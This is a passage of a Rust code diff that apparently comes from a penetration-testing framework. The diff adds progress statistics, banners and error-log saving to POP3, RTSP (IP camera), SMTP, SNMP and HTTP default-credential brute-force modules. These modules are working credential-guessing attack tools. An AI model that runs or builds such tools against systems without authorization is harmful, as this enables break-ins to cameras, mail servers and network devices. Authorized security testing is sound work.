println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[?] Collected {} unknown/errored POP3 responses.",
|
||||
unknown_guard.len()
|
||||
)
|
||||
.yellow()
|
||||
.bold()
|
||||
);
|
||||
if prompt_yes_no("Save unknown responses to file? (y/n): ", true) {
|
||||
let default_name = "pop3_unknown_responses.txt";
|
||||
let fname = prompt_required(&format!(
|
||||
"What should the unknown results be saved as? (default: {}): ",
|
||||
default_name
|
||||
));
|
||||
let chosen = if fname.trim().is_empty() {
|
||||
default_name.to_string()
|
||||
} else {
|
||||
fname.trim().to_string()
|
||||
};
|
||||
if let Err(e) = save_unknown_pop3(&chosen, &unknown_guard) {
|
||||
println!("{}", format!("[!] Failed to save unknown responses: {}", e).red());
|
||||
} else {
|
||||
println!("{}", format!("[+] Unknown responses saved to {}", chosen).green());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -989,6 +1038,24 @@ fn append_result(output_file: &str, username: &str, password: &str) -> Result<()
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn save_unknown_pop3(path: &str, entries: &[(String, String, String)]) -> Result<()> {
|
||||
let mut file = OpenOptions::new()
|
||||
.create(true)
|
||||
.write(true)
|
||||
.truncate(true)
|
||||
.open(path)?;
|
||||
|
||||
writeln!(file, "# POP3 Bruteforce Unknown/Errored Responses")?;
|
||||
writeln!(file, "# Format: username:password - error/response")?;
|
||||
writeln!(file)?;
|
||||
|
||||
for (user, pass, msg) in entries {
|
||||
writeln!(file, "{}:{} - {}", user, pass, msg)?;
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn read_lines(path: &str) -> Result<Vec<String>> {
|
||||
let file = File::open(path).with_context(|| format!("Failed to open: {}", path))?;
|
||||
Ok(BufReader::new(file)
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
@@ -9,8 +9,9 @@ use std::{
|
||||
net::SocketAddr,
|
||||
path::{Path, PathBuf},
|
||||
sync::Arc,
|
||||
time::Instant,
|
||||
};
|
||||
use std::sync::atomic::{AtomicBool, Ordering};
|
||||
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
|
||||
use tokio::{
|
||||
io::{AsyncReadExt, AsyncWriteExt},
|
||||
net::TcpStream,
|
||||
@@ -18,10 +19,91 @@ use tokio::{
|
||||
time::{sleep, Duration},
|
||||
};
|
||||
|
||||
const PROGRESS_INTERVAL_SECS: u64 = 2;
|
||||
|
||||
struct Statistics {
|
||||
total_attempts: AtomicU64,
|
||||
successful_attempts: AtomicU64,
|
||||
failed_attempts: AtomicU64,
|
||||
error_attempts: AtomicU64,
|
||||
start_time: Instant,
|
||||
}
|
||||
|
||||
impl Statistics {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
total_attempts: AtomicU64::new(0),
|
||||
successful_attempts: AtomicU64::new(0),
|
||||
failed_attempts: AtomicU64::new(0),
|
||||
error_attempts: AtomicU64::new(0),
|
||||
start_time: Instant::now(),
|
||||
}
|
||||
}
|
||||
|
||||
fn record_attempt(&self, success: bool, error: bool) {
|
||||
self.total_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
if error {
|
||||
self.error_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else if success {
|
||||
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else {
|
||||
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
|
||||
fn print_progress(&self) {
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
|
||||
|
||||
print!(
|
||||
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
|
||||
"[Progress]".cyan(),
|
||||
total.to_string().bold(),
|
||||
success.to_string().green(),
|
||||
failed,
|
||||
errors.to_string().red(),
|
||||
rate
|
||||
);
|
||||
let _ = std::io::stdout().flush();
|
||||
}
|
||||
|
||||
fn print_final(&self) {
|
||||
println!();
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
|
||||
println!("{}", "=== Statistics ===".bold());
|
||||
println!(" Total attempts: {}", total);
|
||||
println!(" Successful: {}", success.to_string().green().bold());
|
||||
println!(" Failed: {}", failed);
|
||||
println!(" Errors: {}", errors.to_string().red());
|
||||
println!(" Elapsed time: {:.2}s", elapsed);
|
||||
if elapsed > 0.0 {
|
||||
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ Advanced RTSP Brute Force Module ║".cyan());
|
||||
println!("{}", "║ IP Camera and Streaming Server Credential Testing ║".cyan());
|
||||
println!("{}", "║ Supports path enumeration and custom headers ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Main entry point for the advanced RTSP brute force module.
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("=== Advanced RTSP Brute Force Module ===");
|
||||
println!("[*] Target: {}", target);
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
|
||||
let port: u16 = loop {
|
||||
let input = prompt_default("RTSP Port", "554")?;
|
||||
@@ -69,6 +151,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let (addr, implicit_path) = normalize_target_input(target, port)?;
|
||||
let found = Arc::new(Mutex::new(Vec::new()));
|
||||
let stop = Arc::new(AtomicBool::new(false));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
let semaphore = Arc::new(Semaphore::new(concurrency));
|
||||
|
||||
println!("\n[*] Starting brute-force on {}", addr);
|
||||
@@ -113,6 +196,21 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
paths.insert(0, p);
|
||||
}
|
||||
}
|
||||
println!();
|
||||
|
||||
// Start progress reporter
|
||||
let stats_clone = stats.clone();
|
||||
let stop_clone = stop.clone();
|
||||
let progress_handle = tokio::spawn(async move {
|
||||
loop {
|
||||
if stop_clone.load(Ordering::Relaxed) {
|
||||
break;
|
||||
}
|
||||
stats_clone.print_progress();
|
||||
sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS)).await;
|
||||
}
|
||||
});
|
||||
|
||||
let mut tasks = FuturesUnordered::new();
|
||||
let mut idx = 0usize;
|
||||
|
||||
@@ -142,6 +240,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let path_clone = path.clone();
|
||||
let found_clone = Arc::clone(&found);
|
||||
let stop_clone = Arc::clone(&stop);
|
||||
let stats_clone = Arc::clone(&stats);
|
||||
let command = advanced_command.clone();
|
||||
let headers = Arc::clone(&advanced_headers);
|
||||
let semaphore_clone = Arc::clone(&semaphore);
|
||||
@@ -175,17 +274,28 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
{
|
||||
Ok(true) => {
|
||||
let path_str = if path_clone.is_empty() { "NO_PATH" } else { &path_clone };
|
||||
println!("[+] {} -> {}:{} [path={}]", addr_clone, user_clone, pass_clone, path_str);
|
||||
println!("\r{}", format!("[+] {} -> {}:{} [path={}]", addr_clone, user_clone, pass_clone, path_str).green().bold());
|
||||
found_clone
|
||||
.lock()
|
||||
.await
|
||||
.push((addr_clone.clone(), user_clone.clone(), pass_clone.clone(), path_str.to_string()));
|
||||
stats_clone.record_attempt(true, false);
|
||||
if stop_flag {
|
||||
stop_clone.store(true, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
Ok(false) => log(verbose_flag, &format!("[-] {} -> {}:{} [path={}]", addr_clone, user_clone, pass_clone, path_clone)),
|
||||
Err(e) => log(verbose_flag, &format!("[!] {} -> error: {}", addr_clone, e)),
|
||||
Ok(false) => {
|
||||
stats_clone.record_attempt(false, false);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[-] {} -> {}:{} [path={}]", addr_clone, user_clone, pass_clone, path_clone).dimmed());
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
stats_clone.record_attempt(false, true);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[!] {} -> error: {}", addr_clone, e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
drop(permit);
|
||||
@@ -207,15 +317,24 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
|
||||
while let Some(res) = tasks.next().await {
|
||||
if let Err(e) = res {
|
||||
log(verbose, &format!("[!] Task join error: {}", e));
|
||||
if verbose {
|
||||
println!("\r{}", format!("[!] Task join error: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Stop progress reporter
|
||||
stop.store(true, Ordering::Relaxed);
|
||||
let _ = progress_handle.await;
|
||||
|
||||
// Print final statistics
|
||||
stats.print_final();
|
||||
|
||||
let creds = found.lock().await;
|
||||
if creds.is_empty() {
|
||||
println!("\n[-] No credentials found (with these paths).");
|
||||
println!("{}", "[-] No credentials found (with these paths).".yellow());
|
||||
} else {
|
||||
println!("\n[+] Valid credentials (and paths):");
|
||||
println!("{}", format!("[+] Found {} valid credential(s):", creds.len()).green().bold());
|
||||
for (host, user, pass, path) in creds.iter() {
|
||||
println!(" {} -> {}:{} [path={}]", host, user, pass, path);
|
||||
}
|
||||
|
||||
@@ -1,14 +1,32 @@
|
||||
use anyhow::{Result, Context};
|
||||
use colored::*;
|
||||
use reqwest;
|
||||
use std::time::Duration;
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 10;
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ Sample Default Credential Checker ║".cyan());
|
||||
println!("{}", "║ HTTP Basic Auth Test Module ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// A sample credential check - tries a basic auth login
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("[*] Checking default creds on: {}", target);
|
||||
display_banner();
|
||||
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
println!("{}", "[*] Checking default credentials (admin:admin)...".cyan());
|
||||
println!();
|
||||
|
||||
let url = format!("http://{}/login", target);
|
||||
let client = reqwest::Client::new();
|
||||
let client = reqwest::Client::builder()
|
||||
.danger_accept_invalid_certs(true)
|
||||
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
|
||||
.build()?;
|
||||
|
||||
// Hypothetical login using "admin:admin"
|
||||
let resp = client
|
||||
.post(&url)
|
||||
.basic_auth("admin", Some("admin"))
|
||||
@@ -17,9 +35,9 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
.context("Failed to send login request")?;
|
||||
|
||||
if resp.status().is_success() {
|
||||
println!("[+] Default credentials admin:admin are valid!");
|
||||
println!("{}", "[+] Default credentials admin:admin are valid!".green().bold());
|
||||
} else {
|
||||
println!("[-] Default credentials admin:admin failed.");
|
||||
println!("{}", "[-] Default credentials admin:admin failed.".yellow());
|
||||
}
|
||||
|
||||
Ok(())
|
||||
|
||||
@@ -1,17 +1,97 @@
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use colored::Colorize;
|
||||
use colored::*;
|
||||
use regex::Regex;
|
||||
use std::fs::{File, OpenOptions};
|
||||
use std::io::{self, BufRead, BufReader, Write};
|
||||
use std::net::{TcpStream, ToSocketAddrs};
|
||||
use std::path::Path;
|
||||
use std::sync::{Arc, Mutex};
|
||||
use std::sync::atomic::{AtomicBool, Ordering};
|
||||
use std::time::Duration;
|
||||
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
|
||||
use std::time::{Duration, Instant};
|
||||
use telnet::{Telnet, Event};
|
||||
use threadpool::ThreadPool;
|
||||
use crossbeam_channel::unbounded;
|
||||
|
||||
const PROGRESS_INTERVAL_SECS: u64 = 2;
|
||||
|
||||
struct Statistics {
|
||||
total_attempts: AtomicU64,
|
||||
successful_attempts: AtomicU64,
|
||||
failed_attempts: AtomicU64,
|
||||
error_attempts: AtomicU64,
|
||||
start_time: Instant,
|
||||
}
|
||||
|
||||
impl Statistics {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
total_attempts: AtomicU64::new(0),
|
||||
successful_attempts: AtomicU64::new(0),
|
||||
failed_attempts: AtomicU64::new(0),
|
||||
error_attempts: AtomicU64::new(0),
|
||||
start_time: Instant::now(),
|
||||
}
|
||||
}
|
||||
|
||||
fn record_attempt(&self, success: bool, error: bool) {
|
||||
self.total_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
if error {
|
||||
self.error_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else if success {
|
||||
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else {
|
||||
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
|
||||
fn print_progress(&self) {
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
|
||||
|
||||
print!(
|
||||
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
|
||||
"[Progress]".cyan(),
|
||||
total.to_string().bold(),
|
||||
success.to_string().green(),
|
||||
failed,
|
||||
errors.to_string().red(),
|
||||
rate
|
||||
);
|
||||
let _ = std::io::stdout().flush();
|
||||
}
|
||||
|
||||
fn print_final(&self) {
|
||||
println!();
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
|
||||
println!("{}", "=== Statistics ===".bold());
|
||||
println!(" Total attempts: {}", total);
|
||||
println!(" Successful: {}", success.to_string().green().bold());
|
||||
println!(" Failed: {}", failed);
|
||||
println!(" Errors: {}", errors.to_string().red());
|
||||
println!(" Elapsed time: {:.2}s", elapsed);
|
||||
if elapsed > 0.0 {
|
||||
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SMTP Brute Force Module ║".cyan());
|
||||
println!("{}", "║ Supports AUTH PLAIN and AUTH LOGIN ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
#[derive(Clone)]
|
||||
struct SmtpBruteforceConfig {
|
||||
target: String,
|
||||
@@ -25,7 +105,9 @@ struct SmtpBruteforceConfig {
|
||||
}
|
||||
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("\n=== SMTP Bruteforce ===\n");
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
println!();
|
||||
let port = prompt_port(25);
|
||||
let username_wordlist = prompt_wordlist("Username wordlist file: ")?;
|
||||
let password_wordlist = prompt_wordlist("Password wordlist file: ")?;
|
||||
@@ -53,10 +135,21 @@ fn run_smtp_bruteforce(config: SmtpBruteforceConfig) -> Result<()> {
|
||||
if usernames.is_empty() || passwords.is_empty() {
|
||||
return Err(anyhow!("Username or password wordlist is empty."));
|
||||
}
|
||||
println!("[*] Loaded {} username(s).", usernames.len());
|
||||
println!("[*] Loaded {} password(s).", passwords.len());
|
||||
println!("{}", format!("[*] Loaded {} username(s).", usernames.len()).cyan());
|
||||
println!("{}", format!("[*] Loaded {} password(s).", passwords.len()).cyan());
|
||||
|
||||
let total_attempts = if config.full_combo {
|
||||
usernames.len() * passwords.len()
|
||||
} else {
|
||||
passwords.len()
|
||||
};
|
||||
println!("{}", format!("[*] Total attempts: {}", total_attempts).cyan());
|
||||
println!();
|
||||
|
||||
let found = Arc::new(Mutex::new(Vec::new()));
|
||||
let unknown = Arc::new(Mutex::new(Vec::new()));
|
||||
let stop_flag = Arc::new(AtomicBool::new(false));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
let pool = ThreadPool::new(config.threads);
|
||||
let (tx, rx) = unbounded();
|
||||
if config.full_combo {
|
||||
@@ -69,45 +162,119 @@ fn run_smtp_bruteforce(config: SmtpBruteforceConfig) -> Result<()> {
|
||||
for p in &passwords { tx.send((usernames[0].clone(), p.clone()))?; }
|
||||
}
|
||||
drop(tx);
|
||||
|
||||
// Start progress reporter thread
|
||||
let progress_stop = Arc::clone(&stop_flag);
|
||||
let progress_stats = Arc::clone(&stats);
|
||||
let progress_handle = std::thread::spawn(move || {
|
||||
while !progress_stop.load(Ordering::Relaxed) {
|
||||
progress_stats.print_progress();
|
||||
std::thread::sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS));
|
||||
}
|
||||
});
|
||||
|
||||
for _ in 0..config.threads {
|
||||
let rx = rx.clone();
|
||||
let addr = addr.clone();
|
||||
let stop_flag = Arc::clone(&stop_flag);
|
||||
let found = Arc::clone(&found);
|
||||
let unknown = Arc::clone(&unknown);
|
||||
let stats = Arc::clone(&stats);
|
||||
let config = config.clone();
|
||||
pool.execute(move || {
|
||||
while let Ok((user, pass)) = rx.recv() {
|
||||
if stop_flag.load(Ordering::Relaxed) { break; }
|
||||
if config.verbose { println!("[*] {}:{}", user, pass); }
|
||||
match try_smtp_login(&addr, &user, &pass) {
|
||||
Ok(true) => {
|
||||
println!("[+] VALID: {}:{}", user, pass);
|
||||
println!("\r{}", format!("[+] VALID: {}:{}", user, pass).green().bold());
|
||||
let mut creds = found.lock().unwrap(); creds.push((user.clone(), pass.clone()));
|
||||
stats.record_attempt(true, false);
|
||||
if config.stop_on_success {
|
||||
stop_flag.store(true, Ordering::Relaxed);
|
||||
while rx.try_recv().is_ok() {}
|
||||
break;
|
||||
}
|
||||
}
|
||||
Ok(false) => {}
|
||||
Err(e) => if config.verbose { eprintln!("[!] {}:{}: {}", user, pass, e); },
|
||||
Ok(false) => {
|
||||
stats.record_attempt(false, false);
|
||||
if config.verbose {
|
||||
println!("\r{}", format!("[-] Failed: {}:{}", user, pass).dimmed());
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
stats.record_attempt(false, true);
|
||||
let msg = e.to_string();
|
||||
{
|
||||
let mut unk = unknown.lock().unwrap();
|
||||
unk.push((user.clone(), pass.clone(), msg.clone()));
|
||||
}
|
||||
if config.verbose {
|
||||
eprintln!("\r{}", format!("[?] {}:{} -> {}", user, pass, msg).yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
});
|
||||
}
|
||||
pool.join();
|
||||
let found = found.lock().unwrap();
|
||||
if found.is_empty() {
|
||||
println!("[-] No valid credentials.");
|
||||
|
||||
// Stop progress reporter
|
||||
stop_flag.store(true, Ordering::Relaxed);
|
||||
let _ = progress_handle.join();
|
||||
|
||||
// Print final statistics
|
||||
stats.print_final();
|
||||
let found_guard = found.lock().unwrap();
|
||||
if found_guard.is_empty() {
|
||||
println!("{}", "[-] No valid credentials found.".yellow());
|
||||
} else {
|
||||
println!("[+] Found:");
|
||||
for (u,p) in found.iter() { println!("{}:{}", u, p); }
|
||||
if prompt("Save found? (y/n): ").trim().eq_ignore_ascii_case("y") {
|
||||
let f = prompt("Filename: ");
|
||||
save_results(&f, &found)?;
|
||||
println!("[+] Saved to {}", f);
|
||||
println!("{}", format!("[+] Found {} valid credential(s):", found_guard.len()).green().bold());
|
||||
for (u,p) in found_guard.iter() { println!(" {} {}:{}", "✓".green(), u, p); }
|
||||
if prompt("\nSave found credentials? (y/n): ").trim().eq_ignore_ascii_case("y") {
|
||||
let f = prompt("What should the valid results be saved as?: ");
|
||||
if !f.trim().is_empty() {
|
||||
save_results(&f, &found_guard)?;
|
||||
println!("{}", format!("[+] Results saved to {}", f).green());
|
||||
} else {
|
||||
println!("{}", "[-] Filename cannot be empty. Skipping save.".yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
drop(found_guard);
|
||||
|
||||
let unknown_guard = unknown.lock().unwrap();
|
||||
if !unknown_guard.is_empty() {
|
||||
println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[?] Collected {} unknown/errored SMTP responses.",
|
||||
unknown_guard.len()
|
||||
)
|
||||
.yellow()
|
||||
.bold()
|
||||
);
|
||||
if prompt("Save unknown responses to file? (y/n): ")
|
||||
.trim()
|
||||
.eq_ignore_ascii_case("y")
|
||||
{
|
||||
let default_name = "smtp_bruteforce_unknown.txt";
|
||||
let fname = prompt(&format!(
|
||||
"What should the unknown results be saved as? [{}]: ",
|
||||
default_name
|
||||
));
|
||||
let chosen = if fname.trim().is_empty() {
|
||||
default_name.to_string()
|
||||
} else {
|
||||
fname.trim().to_string()
|
||||
};
|
||||
if let Err(e) = save_unknown_smtp(&chosen, &unknown_guard) {
|
||||
println!("{}", format!("[!] Failed to save unknown responses: {}", e).red());
|
||||
} else {
|
||||
println!("{}", format!("[+] Unknown responses saved to {}", chosen).green());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -207,6 +374,24 @@ fn save_results(path: &str, creds: &[(String, String)]) -> Result<()> {
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn save_unknown_smtp(path: &str, entries: &[(String, String, String)]) -> Result<()> {
|
||||
let mut file = OpenOptions::new()
|
||||
.create(true)
|
||||
.write(true)
|
||||
.truncate(true)
|
||||
.open(path)?;
|
||||
|
||||
writeln!(file, "# SMTP Bruteforce Unknown/Errored Responses")?;
|
||||
writeln!(file, "# Format: username:password - error/response")?;
|
||||
writeln!(file)?;
|
||||
|
||||
for (user, pass, msg) in entries {
|
||||
writeln!(file, "{}:{} - {}", user, pass, msg)?;
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn prompt(msg: &str) -> String {
|
||||
print!("{}", msg);
|
||||
if let Err(e) = io::stdout().flush() {
|
||||
|
||||
@@ -7,15 +7,95 @@ use std::{
|
||||
net::{SocketAddr, UdpSocket},
|
||||
path::{Path, PathBuf},
|
||||
sync::Arc,
|
||||
time::Duration,
|
||||
time::{Duration, Instant},
|
||||
};
|
||||
use std::sync::atomic::{AtomicBool, Ordering};
|
||||
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
|
||||
use regex::Regex;
|
||||
use tokio::{sync::Mutex, task::spawn_blocking, time::sleep};
|
||||
|
||||
const PROGRESS_INTERVAL_SECS: u64 = 2;
|
||||
|
||||
struct Statistics {
|
||||
total_attempts: AtomicU64,
|
||||
successful_attempts: AtomicU64,
|
||||
failed_attempts: AtomicU64,
|
||||
error_attempts: AtomicU64,
|
||||
start_time: Instant,
|
||||
}
|
||||
|
||||
impl Statistics {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
total_attempts: AtomicU64::new(0),
|
||||
successful_attempts: AtomicU64::new(0),
|
||||
failed_attempts: AtomicU64::new(0),
|
||||
error_attempts: AtomicU64::new(0),
|
||||
start_time: Instant::now(),
|
||||
}
|
||||
}
|
||||
|
||||
fn record_attempt(&self, success: bool, error: bool) {
|
||||
self.total_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
if error {
|
||||
self.error_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else if success {
|
||||
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else {
|
||||
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
|
||||
fn print_progress(&self) {
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
|
||||
|
||||
print!(
|
||||
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
|
||||
"[Progress]".cyan(),
|
||||
total.to_string().bold(),
|
||||
success.to_string().green(),
|
||||
failed,
|
||||
errors.to_string().red(),
|
||||
rate
|
||||
);
|
||||
let _ = std::io::stdout().flush();
|
||||
}
|
||||
|
||||
fn print_final(&self) {
|
||||
println!();
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
|
||||
println!("{}", "=== Statistics ===".bold());
|
||||
println!(" Total attempts: {}", total);
|
||||
println!(" Valid communities: {}", success.to_string().green().bold());
|
||||
println!(" Invalid: {}", failed);
|
||||
println!(" Errors: {}", errors.to_string().red());
|
||||
println!(" Elapsed time: {:.2}s", elapsed);
|
||||
if elapsed > 0.0 {
|
||||
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SNMPv1/v2c Brute Force Module ║".cyan());
|
||||
println!("{}", "║ Community String Discovery Tool ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("=== SNMPv1 & SNMPv2c Brute Force Module ===");
|
||||
println!("[*] Target: {}", target);
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
|
||||
let port: u16 = loop {
|
||||
let input = prompt_default("SNMP Port", "161")?;
|
||||
@@ -89,6 +169,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
|
||||
let found = Arc::new(Mutex::new(Vec::new()));
|
||||
let stop = Arc::new(AtomicBool::new(false));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
|
||||
println!("\n[*] Starting SNMP brute-force on {}", connect_addr);
|
||||
println!("[*] SNMP Version: {}", if snmp_version == 0 { "v1" } else { "v2c" });
|
||||
@@ -98,6 +179,21 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
println!("[!] Community wordlist is empty or invalid. Exiting.");
|
||||
return Ok(());
|
||||
}
|
||||
println!("{}", format!("[*] Loaded {} community strings", communities.len()).cyan());
|
||||
println!();
|
||||
|
||||
// Start progress reporter
|
||||
let stats_clone = stats.clone();
|
||||
let stop_clone = stop.clone();
|
||||
let progress_handle = tokio::spawn(async move {
|
||||
loop {
|
||||
if stop_clone.load(Ordering::Relaxed) {
|
||||
break;
|
||||
}
|
||||
stats_clone.print_progress();
|
||||
sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS)).await;
|
||||
}
|
||||
});
|
||||
|
||||
let communities = Arc::new(communities);
|
||||
let mut tasks: FuturesUnordered<_> = FuturesUnordered::new();
|
||||
@@ -111,6 +207,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let community_clone = community.clone();
|
||||
let found_clone = Arc::clone(&found);
|
||||
let stop_clone = Arc::clone(&stop);
|
||||
let stats_clone = Arc::clone(&stats);
|
||||
let stop_flag = stop_on_success;
|
||||
let verbose_flag = verbose;
|
||||
let version = snmp_version;
|
||||
@@ -123,20 +220,27 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
|
||||
match try_snmp_community(&addr_clone, &community_clone, version, timeout).await {
|
||||
Ok(true) => {
|
||||
println!("[+] {} -> community: '{}'", addr_clone, community_clone);
|
||||
println!("\r{}", format!("[+] {} -> community: '{}'", addr_clone, community_clone).green().bold());
|
||||
found_clone
|
||||
.lock()
|
||||
.await
|
||||
.push((addr_clone.clone(), community_clone.clone()));
|
||||
stats_clone.record_attempt(true, false);
|
||||
if stop_flag {
|
||||
stop_clone.store(true, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
Ok(false) => {
|
||||
log(verbose_flag, &format!("[-] {} -> community: '{}'", addr_clone, community_clone));
|
||||
stats_clone.record_attempt(false, false);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[-] {} -> community: '{}'", addr_clone, community_clone).dimmed());
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
log(verbose_flag, &format!("[!] {}: error: {}", addr_clone, e));
|
||||
stats_clone.record_attempt(false, true);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[!] {}: error: {}", addr_clone, e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -154,15 +258,24 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
|
||||
while let Some(res) = tasks.next().await {
|
||||
if let Err(e) = res {
|
||||
log(verbose, &format!("[!] Task join error: {}", e));
|
||||
if verbose {
|
||||
println!("\r{}", format!("[!] Task join error: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
